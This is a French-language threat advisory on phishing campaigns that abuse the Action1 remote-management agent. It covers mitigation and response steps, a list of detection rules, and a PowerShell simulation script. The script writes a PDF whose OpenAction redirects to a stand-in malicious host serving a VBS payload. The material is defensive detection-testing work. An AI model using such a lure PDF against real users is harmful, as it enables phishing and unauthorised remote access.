L’abus des outils RMM continue de croître dans les campagnes de menaces actives
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Les acteurs malveillants abusent des outils de gestion et de surveillance à distance (RMM), en particulier Action1, pour établir un accès persistant dans des environnements compromis. L’attaque commence par un e-mail de phishing contenant un fichier PDF malveillant qui redirige les victimes vers un fichier VBS. Le script télécharge ensuite et installe un paquet MSI contenant l’agent Action1 légitime, permettant un accès à distance non autorisé.
Enquête
L’enquête a révélé un PDF malveillant utilisant les mots-clés OpenAction et URI pour initier un téléchargement à partir d’une URL hébergée par Vercel. L’analyse du paquet MSI récupéré a révélé que des fichiers légitimes d’Action1 Corporation étaient détournés via l’infrastructure cloud du fournisseur. L’agent installé contient un CustomerID spécifique et communique avec un domaine légitime d’Action1.
Atténuation
Les organisations devraient configurer le filtrage des e-mails pour identifier les structures PDF suspectes contenant des mots-clés OpenAction ou URI. Les équipes de sécurité devraient surveiller les installations non autorisées d’outils RMM et la création du service A1Agent. Bloquer les connexions à une infrastructure cloud RMM inattendue et identifier les CustomerID inhabituels ou non autorisés peut également réduire le risque d’abus d’accès à distance.
Réponse
Lorsqu’une activité RMM malveillante est détectée, isolez l’hôte affecté pour empêcher toute exécution de commande distante supplémentaire. Enquêtez l’e-mail de phishing d’origine et effectuez une analyse médico-légale des fichiers VBS et MSI associés. Révoquez les identifiants potentiellement compromis et examinez les configurations de l’agent Action1 pour détecter des indicateurs d’accès à distance non autorisé ou de persistance.
Flux d’Attaque
Nous mettons encore à jour cette partie.
Détections
LOLBAS WScript/CScript (via process_creation)
Logiciels alternatifs de gestion/accès à distance (via process_creation)
Possibilité d’infiltration/exfiltration de données/C2 via des services/outils tiers (via proxy)
Possibilité d’infiltration/exfiltration de données/C2 via des services/outils tiers (via dns)
Activité possible de commande et de contrôle par tentative de communication de domaine de logiciel d’accès à distance (via dns)
IOCs (HashSha256) pour détecter : Plus d’outils RMM dans la nature
Connexion à distance aux serveurs d’entreprise Action1 [Connexion réseau Windows]
PDF OpenAction et redirection URI vers VBS malveillant [Événement de fichier Windows]
Exécution de simulation
-
Narration de l’attaque et commandes : L’adversaire simule une campagne de phishing. Le but est de livrer un fichier nommé
Reçu de transaction .pdfà une victime. Le PDF est spécialement conçu pour que dès que l’utilisateur l’ouvre, la commande/OpenActiondéclenche une/URIredirection. Cette redirection est destinée à conduire l’utilisateur vers un site qui sert un VBScript malveillant. Pour déclencher la règle de détection spécifique fournie, nous créerons un fichier avec le nom exact et les chaînes internes requises. -
Script de test de régression :
# Script de simulation : Déclenchement de la détection PDF OpenAction $targetFile = "$env:USERPROFILEDesktopReçu de Transaction .pdf" # Création du contenu PDF "malveillant" pour correspondre aux mots-clés de détection $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://site-malveillant.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Écriture du fichier sur le disque pour déclencher la détection 'file_event' $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Fichier de simulation créé à : $targetFile" Write-Host "Vérifiez votre SIEM pour l'alerte de détection." -
Commandes de nettoyage :
# Nettoyage : Supprimer le fichier malveillant simulé $targetFile = "$env:USERPROFILEDesktopReçu de Transaction .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Nettoyage terminé : $targetFile supprimé." } else { Write-Host "Nettoyage : Fichier non trouvé." }